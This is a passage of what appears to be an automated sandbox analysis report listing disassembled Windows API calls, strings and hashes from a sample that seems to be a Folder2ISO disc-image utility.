                  • SetDlgItemTextW.USER32(?,00000005,00000000), ref: 006212EA
                  • SetDlgItemTextW.USER32(?,00000006,00000000), ref: 006212F8
                  • SetDlgItemTextW.USER32(?,00000007,00000000), ref: 00621306
                  • GetDlgItem.USER32(?,0000000D), ref: 00621311
                  • GetDlgItem.USER32(?,0000000E), ref: 00621318
                  • GetDlgItem.USER32(?,0000000F), ref: 0062131F
                  • SendMessageW.USER32(00000000,00001501,00000000,00000000), ref: 0062133A
                  • SendMessageW.USER32(00000000,00001501,00000000,00000000), ref: 0062134E
                  • SendMessageW.USER32(00000000,00001501,00000000,00000000), ref: 0062135D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Item$Text$MessageSend
                  • String ID:
                  • API String ID: 3384191816-0
                  • Opcode ID: c59542779b0c1d967863a575d7ff205165dc8f72a66be293dd73edda2569e889
                  • Instruction ID: 5e31f079f89e4b1ac4c93724dfbe0b0d30f48954c61abdc8b6a52a605e9584d9
                  • Opcode Fuzzy Hash: c59542779b0c1d967863a575d7ff205165dc8f72a66be293dd73edda2569e889
                  • Instruction Fuzzy Hash: C91112A2B8572879F57432756C5BF3B2F0ECB42B61F24441BBB09EE0C2DCD9A94049A4
                  APIs
                  • MulDiv.KERNEL32(?,00000064,?), ref: 006226AF
                    • Part of subcall function 00621E9A: SetDlgItemTextW.USER32(00000000,00000012,?), ref: 00621ED6
                    • Part of subcall function 00621E9A: GetDlgItem.USER32(00000000,00000011), ref: 00621EDF
                    • Part of subcall function 00621E9A: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00621EEE
                  • KillTimer.USER32(?,0000000F), ref: 006226D0
                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00622701
                  • CloseHandle.KERNEL32(?,?,CloseWhenDone,00000000), ref: 0062270A
                  • wsprintfW.USER32 ref: 00622735
                  • GetDlgItemTextW.USER32(?,0000000E,?,00000104), ref: 0062274D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Item$MessageText$CloseHandleKillPostSendTimerwsprintf
                  • String ID: CloseWhenDone$RevealWhenDone$explorer.exe /select,
                  • API String ID: 367197272-3110793137
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00622B01
                  • lstrcpyW.KERNEL32(C:\Users\user\Desktop\6RVmzn1DzL.ini,?), ref: 00622B60
                  • CreateMutexW.KERNEL32(00000000,00000001,Folder2ISO,?,AllowMultipleInstances,00000001), ref: 00622B7F
                  • GetLastError.KERNEL32(?,AllowMultipleInstances,00000001), ref: 00622B85
                  • EnumWindows.USER32(00622A7A,00000000), ref: 00622B98
                  Strings
                  Similarity
                  • API ID: CreateEnumErrorFileLastModuleMutexNameWindowslstrcpy
                  • String ID: .ini$AllowMultipleInstances$C:\Users\user\Desktop\6RVmzn1DzL.ini$Folder2ISO
                  • API String ID: 365442408-1378453226
                  APIs
                  Similarity
                  • API ID: _strncmp
                  • String ID:
                  • API String ID: 909875538-0
                  APIs
                  • __lseeki64_nolock.LIBCMT ref: 0063FDF7
                  • __lseeki64_nolock.LIBCMT ref: 0063FE17
                    • Part of subcall function 0063CB83: SetFilePointerEx.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000000,0063A05D,?,00000000,00000000,00000002,?), ref: 0063CBBA
                    • Part of subcall function 0063CB83: GetLastError.KERNEL32 ref: 0063CBC4
                    • Part of subcall function 0063CB83: __dosmaperr.LIBCMT ref: 0063CBCB
                  • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,00000001,00000000,00000000), ref: 0063FE4B
                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000001,00000000,00000000), ref: 0063FE52
                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0063FEF7
                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0063FEFE
                  • __lseeki64_nolock.LIBCMT ref: 0063FF1B
                  • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0063FF36
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0063FF63
                  • __lseeki64_nolock.LIBCMT ref: 0063FF81
                  Similarity
                  • API ID: Heap__lseeki64_nolock$ErrorFileLastProcess$AllocFreePointer__dosmaperr
                  • String ID:
                  • API String ID: 2469247693-0
                  APIs
                  • ___DestructExceptionObject.LIBCMT ref: 00639357
                    • Part of subcall function 00639472: _CallSETranslator.LIBCMT ref: 006394D7
                  • ___DestructExceptionObject.LIBCMT ref: 00639419
                  • _UnwindNestedFrames.LIBCMT ref: 00639451
                  • CallUnexpected.LIBCMT ref: 0063946C
                  Strings
                  Similarity
                  • API ID: CallDestructExceptionObject$FramesNestedTranslatorUnexpectedUnwind
                  • String ID: csm$csm$csm
                  • API String ID: 610588288-393685449
                  APIs
                  Strings
                  Similarity
                  • API ID: __allrem$__getptd_noexit
                  • String ID: s+b
                  • API String ID: 1539570564-2084237830
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,00650B42,00000104,00000001,00000000), ref: 00634141
                  • GetStdHandle.KERNEL32(000000F4,00000000,00000001,00000000), ref: 006341FB
                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0063424A
                  Strings
                  Similarity
                  • API ID: File$HandleModuleNameWrite
                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                  • API String ID: 3784150691-4022980321
                  APIs
                  • GetWindowLongW.USER32(?,000000EB), ref: 00622850
                    • Part of subcall function 006220BD: IsIconic.USER32(?), ref: 006220D7
                    • Part of subcall function 006220BD: ShowWindow.USER32(?,00000009), ref: 006220E4
                    • Part of subcall function 006220BD: DragQueryFileW.SHELL32(?,00000000,?,0000012C), ref: 006220F9
                    • Part of subcall function 006220BD: DragFinish.SHELL32(?), ref: 0062212F
                  • ImageList_Draw.COMCTL32(00000000,?,00000000,00000000,00000001), ref: 006229CC
                  • SetWindowLongW.USER32(?,00000000,00000001), ref: 006229D8
                  Similarity
                  • API ID: Window$DragLong$DrawFileFinishIconicImageList_QueryShow
                  • String ID:
                  • API String ID: 2049648798-0
                  APIs
                  • InterlockedDecrement.KERNEL32(?), ref: 00635289
                  • InterlockedDecrement.KERNEL32(00000000), ref: 00635294
                  • InterlockedDecrement.KERNEL32(?), ref: 006352A1
                  • InterlockedDecrement.KERNEL32(?), ref: 006352AC
                  • InterlockedDecrement.KERNEL32(?), ref: 006352B9
                  • InterlockedDecrement.KERNEL32(00000000), ref: 006352D1
                  • InterlockedDecrement.KERNEL32(?), ref: 006352E2
                  • InterlockedDecrement.KERNEL32(?), ref: 006352F7
                  Similarity
                  • API ID: DecrementInterlocked
                  • String ID:
                  • API String ID: 3448037634-0
                  APIs
                  • InterlockedIncrement.KERNEL32(?), ref: 006350B5
                  • InterlockedIncrement.KERNEL32(00000000), ref: 006350C0
                  • InterlockedIncrement.KERNEL32(?), ref: 006350CD
                  • InterlockedIncrement.KERNEL32(00000000), ref: 006350D8
                  • InterlockedIncrement.KERNEL32(?), ref: 006350E5
                  • InterlockedIncrement.KERNEL32(?), ref: 006350FD
                  • InterlockedIncrement.KERNEL32(00000000), ref: 0063510E
                  • InterlockedIncrement.KERNEL32(?), ref: 00635122
                  Similarity
                  • API ID: IncrementInterlocked
                  • String ID:
                  • API String ID: 3508698243-0
                  Strings
                  Similarity
                  • API ID: __getptd_noexit
                  • String ID: s+b
                  • API String ID: 3074181302-2084237830
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00635DC6,?,?,?), ref: 00635BF9
                  • __alloca_probe_16.LIBCMT ref: 00635C37
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,?,00635DC6,?,?,?,?,?,?), ref: 00635C79
                  • __alloca_probe_16.LIBCMT ref: 00635D05
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00635D68
                  • __freea.LIBCMT ref: 00635D71
                    • Part of subcall function 0063089A: __FF_MSGBANNER.LIBCMT ref: 006308B8
                    • Part of subcall function 0063089A: HeapAlloc.KERNEL32(011F0000,00000000,00000001,00000000,?,00000000,00000000,00632F0A,?,00000000,00000000,?,00000000,0063AB79,00000018,0064CAE0), ref: 006308D9
                  • __freea.LIBCMT ref: 00635D78
                  Similarity
                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeap
                  • String ID:
                  • API String ID: 1244195299-0
                  APIs
                    • Part of subcall function 00635057: __getptd_noexit.LIBCMT ref: 00635057
                    • Part of subcall function 0063841E: __lock.LIBCMT ref: 00638435
                  • __allrem.LIBCMT ref: 00631150
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0063116C
                  • __allrem.LIBCMT ref: 00631184
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006311A1
                  • __allrem.LIBCMT ref: 006311B7
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006311D4
                  Similarity
                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__getptd_noexit__lock
                  • String ID:
                  • API String ID: 3664976373-0
                  APIs
                  • __lock.LIBCMT ref: 00633A7B
                    • Part of subcall function 0063AAAF: __mtinitlocknum.LIBCMT ref: 0063AAC1
                    • Part of subcall function 0063AAAF: EnterCriticalSection.KERNEL32(?,?,0063395B,0000000D), ref: 0063AADA
                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00633AA7
                  • GetStartupInfoW.KERNEL32(?,0064C798,00000064,0062F518,0064C5D8,00000010), ref: 00633B00
                  • GetFileType.KERNEL32(?), ref: 00633BD9
                  Similarity
                  • API ID: CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__lock__mtinitlocknum
                  • String ID:
                  • API String ID: 673813358-0
                  APIs
                  • __mtinitlocknum.LIBCMT ref: 0063C4B5
                    • Part of subcall function 0063AB37: __FF_MSGBANNER.LIBCMT ref: 0063AB4C
                  • __lock.LIBCMT ref: 0063C4C8
                  • __lock.LIBCMT ref: 0063C514
                  • EnterCriticalSection.KERNEL32(0000000C,0064CB60,00000018,0063D163,?,00000000,s+b,?,?,?,?,?,?,?,00000109), ref: 0063C551
                  • LeaveCriticalSection.KERNEL32(0000000C,?,?,?,?,?,?,?,00000109), ref: 0063C561
                  Similarity
                  • API ID: CriticalSection__lock$EnterLeave__mtinitlocknum
                  • String ID:
                  • API String ID: 3647371838-0
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,00000100,?,00000000,?,?,0063C120,?,?,?,?), ref: 0063C03C
                  • __alloca_probe_16.LIBCMT ref: 0063C071
                  • _memset.LIBCMT ref: 0063C0A8
                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?), ref: 0063C0BD
                  • GetStringTypeW.KERNEL32(00000000,00000000,00000000,?), ref: 0063C0CF
                  • __freea.LIBCMT ref: 0063C0D8
                  Similarity
                  • API ID: ByteCharMultiWide$StringType__alloca_probe_16__freea_memset
                  • String ID:
                  • API String ID: 2644217261-0
                  APIs
                  • lstrcpyW.KERNEL32(?,?), ref: 00621BE3
                  • lstrcpyW.KERNEL32(-00000002,0064AC74), ref: 00621C1C
                  • lstrcpyW.KERNEL32(?,?), ref: 00621C4B
                  Strings
                  Similarity
                  • API ID: lstrcpy
                  • String ID: BDAV$BDMV$VIDEO_TS
                  • API String ID: 3722407311-1491862410
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: __sopen_s
                  • String ID: UNICODE$UTF-16LE$UTF-8$ccs
                  • API String ID: 2693426323-3573488595
                  • Opcode ID: 43dfe4bbe62496ab2783c730512f05967f65921a9a57bcb18472a28fe0c8f9b5
                  • Instruction ID: 8963ee27fcd4082779520560f888959078009a41ac0128f1117fd0b198cc95ab
                  • Opcode Fuzzy Hash: 43dfe4bbe62496ab2783c730512f05967f65921a9a57bcb18472a28fe0c8f9b5
                  • Instruction Fuzzy Hash: F85137B2D083038EE7384E6589467F276A7EBA0358F29052DFD8593381EFA5CD4792D1
                  APIs
                  • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00635508
                  • ___crtGetStringTypeA.LIBCMT ref: 0063556C
                  • ___crtLCMapStringA.LIBCMT ref: 0063558C
                  • ___crtLCMapStringA.LIBCMT ref: 006355B3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: String___crt$InfoType
                  • String ID:
                  • API String ID: 2559498669-3916222277
                  • Opcode ID: e19c6add1e7f70186f867b2c55533ff19cf854ea55c430b0537b18180e41ea73
                  • Instruction ID: a4f112c09f19ae33c36171bc378617feeb9ea61168b2a242142b2221464d37c0
                  • Opcode Fuzzy Hash: e19c6add1e7f70186f867b2c55533ff19cf854ea55c430b0537b18180e41ea73
                  • Instruction Fuzzy Hash: 8D412671108B849ED7268B24CC45EFBBBEFAF8A308F58086DE4C787152D221E5059BA1
                  APIs
                  • wsprintfW.USER32 ref: 00621EC6
                  • SetDlgItemTextW.USER32(00000000,00000012,?), ref: 00621ED6
                  • GetDlgItem.USER32(00000000,00000011), ref: 00621EDF
                  • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00621EEE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Item$MessageSendTextwsprintf
                  • String ID: %d%%
                  • API String ID: 1723200183-1518462796
                  • Opcode ID: a8056dc18ba834220a3ed23bf4a565738d432e874d04dfbc4a9bcfc5c126ea6d
                  • Instruction ID: bb5bca90aed02ae43067bc2efde233bdaf82796e23b7334f5663181011b4b711
                  • Opcode Fuzzy Hash: a8056dc18ba834220a3ed23bf4a565738d432e874d04dfbc4a9bcfc5c126ea6d
                  • Instruction Fuzzy Hash: 14F02875A40318BBCB10DBA4AC49EBF777DEF46710F500019F901E7280DAB05F018791
                  APIs
                  • wsprintfW.USER32 ref: 00629EC4
                    • Part of subcall function 00625FD3: GetProcessHeap.KERNEL32(00000000,?,00629F1C,00000000,00000000), ref: 00625FD9
                    • Part of subcall function 00625FD3: HeapFree.KERNEL32(00000000), ref: 00625FE0
                  • wsprintfW.USER32 ref: 00629F6B
                    • Part of subcall function 006410FF: FindFirstFileW.KERNEL32(?,?,00000001,00000000,?), ref: 00641197
                  • wsprintfW.USER32 ref: 0062A035
                  • wsprintfW.USER32 ref: 0062A288
                  • wsprintfW.USER32 ref: 0062A3DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: wsprintf$Heap$FileFindFirstFreeProcess
                  • String ID:
                  • API String ID: 1327367631-0
                  • Opcode ID: 93ff32b90e4580ea972140599c26400cbc6c403398e3452cab44943d4e044193
                  • Instruction ID: 871c31c847803e75244dbb4a99ce31ba0614aed38d6d5f0ffff9d0d06b40d770
                  • Opcode Fuzzy Hash: 93ff32b90e4580ea972140599c26400cbc6c403398e3452cab44943d4e044193
                  • Instruction Fuzzy Hash: 7412DA715087919BC760EFA4E885BDFB7EAAF89300F00091DF58997241EB75A948CF63
                  APIs
                  • getSystemCP.LIBCMT ref: 006358CD
                    • Part of subcall function 0063541A: GetOEMCP.KERNEL32(00000000), ref: 00635443
                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,00000000), ref: 00635922
                  • GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000), ref: 00635936
                  • _memset.LIBCMT ref: 0063594E
                    • Part of subcall function 00635488: _memset.LIBCMT ref: 0063549D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset$CodeInfoPageSystemValid
                  • String ID:
                  • API String ID: 1927818438-0
                  • Opcode ID: 9e2926cf4c8d80c7321a6f10eefea1e5c05535348f7bb14d7f988dcee35649b7
                  • Instruction ID: ab7f878965ae8adc7529a82aa1ca9fc82631cc9c325c7aecde2ae06f3c5b3cb7
                  • Opcode Fuzzy Hash: 9e2926cf4c8d80c7321a6f10eefea1e5c05535348f7bb14d7f988dcee35649b7
                  • Instruction Fuzzy Hash: F4514671504BC19FD725DF20C8807BABBE7AF41314F24496EE0878B292E6319985DBD2
                  APIs
                  • GetEnvironmentStringsW.KERNEL32(?,0062F534), ref: 00634397
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,0062F534), ref: 006343CC
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,0062F534), ref: 006343EF
                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,0062F534), ref: 00634403
                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,0062F534), ref: 0063440E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                  • String ID:
                  • API String ID: 1823725401-0
                  • Opcode ID: 9a525cfd990c69d3af7892c0fee5cbcca248a4b681d9df15923251556bf964e3
                  • Instruction ID: 2d165e6910030b873c1b54e3d611c0ef8e09d6494458f98dcf7cf3c6ff105c59
                  • Opcode Fuzzy Hash: 9a525cfd990c69d3af7892c0fee5cbcca248a4b681d9df15923251556bf964e3
                  • Instruction Fuzzy Hash: 6F01D4A65002577FA7301BB56C5CD77AAEFDA92658716443AFE05C3201EE609C0181F0
                  APIs
                  • __init_pointers.LIBCMT ref: 006339C5
                    • Part of subcall function 00632C9C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006332F2
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00633306
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00633319
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0063332C
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0063333F
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00633352
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00633365
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00633378
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0063338B
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0063339E
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 006333B1
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 006333C4
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 006333D7
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 006333EA
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 006333FD
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00633410
                  • __mtinitlocks.LIBCMT ref: 006339CA
                  • __mtterm.LIBCMT ref: 006339D3
                    • Part of subcall function 00633A3B: DeleteCriticalSection.KERNEL32(?,?,?,?,006339D8,0062F4FE,0064C5D8,00000010), ref: 0063AAFA
                    • Part of subcall function 00633A3B: DeleteCriticalSection.KERNEL32(0064F9B8,?,?,006339D8,0062F4FE,0064C5D8,00000010), ref: 0063AB23
                  • GetCurrentThreadId.KERNEL32 ref: 00633A21
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: AddressProc$CriticalDeleteSection$CurrentHandleModuleThread__init_pointers__mtinitlocks__mtterm
                  • String ID:
                  • API String ID: 2077300055-0
                  • Opcode ID: e3cd121dbaa8a634b42c532f5f4a9d46e5d8c551054692e363438efe57afbcfe
                  • Instruction ID: 2065bbbe0081f45afabeb850f9844521611997c0eec17324d34c44172577a07f
                  • Opcode Fuzzy Hash: e3cd121dbaa8a634b42c532f5f4a9d46e5d8c551054692e363438efe57afbcfe
                  • Instruction Fuzzy Hash: EAF067322493726DE7A4B774BC1768A2A978F02730F21461EF091957E1FA628A8241D8
                  APIs
                  • _memset.LIBCMT ref: 00626E91
                    • Part of subcall function 0062807D: _sprintf.LIBCMT ref: 00628129
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset_sprintf
                  • String ID: "$CD001$none
                  • API String ID: 1557529856-3346326981
                  • Opcode ID: 193631fdbc5b98fe2cd7b43c5e69c4eaa3e7a04ad8119a35dcc0c52c0042e812
                  • Instruction ID: b68803fb4448c84240330b06cdb9cf65f928331afef1bee5db22f04aef6fdc0d
                  • Opcode Fuzzy Hash: 193631fdbc5b98fe2cd7b43c5e69c4eaa3e7a04ad8119a35dcc0c52c0042e812
                  • Instruction Fuzzy Hash: B9816A75605648AFDB91EF24DC82FEA3BAAEF49300F04047DFD488F287DA7195088B65
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: __write$__getptd_noexit__lseeki64
                  • String ID: s+b
                  • API String ID: 1670646965-2084237830
                  • Opcode ID: 2946b2750613e8078b719fc1218b7a414e34c93fecc4924195cff4ebade99551
                  • Instruction ID: 6e1a3d88a9ebaa914ccde8f5e82ecbfee4e5f54a87bad7a09c76b34ef2ca405f
                  • Opcode Fuzzy Hash: 2946b2750613e8078b719fc1218b7a414e34c93fecc4924195cff4ebade99551
                  • Instruction Fuzzy Hash: 1841F3B2108B058BD3389E68C891A767BD7DF85334F148A1DE4B6877D2E774A8019BE1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: __tolower_l$___ascii_strnicmp
                  • String ID: s+b
                  • API String ID: 1039138858-2084237830
                  • Opcode ID: 9cc37737b00798d4d895fb2e47299d26ba330b1cd20761385952386f396e99c7
                  • Instruction ID: 56abc6e1291e8a040ddc3f13198e99bc35bb561322364ba935d797a90a33e3e7
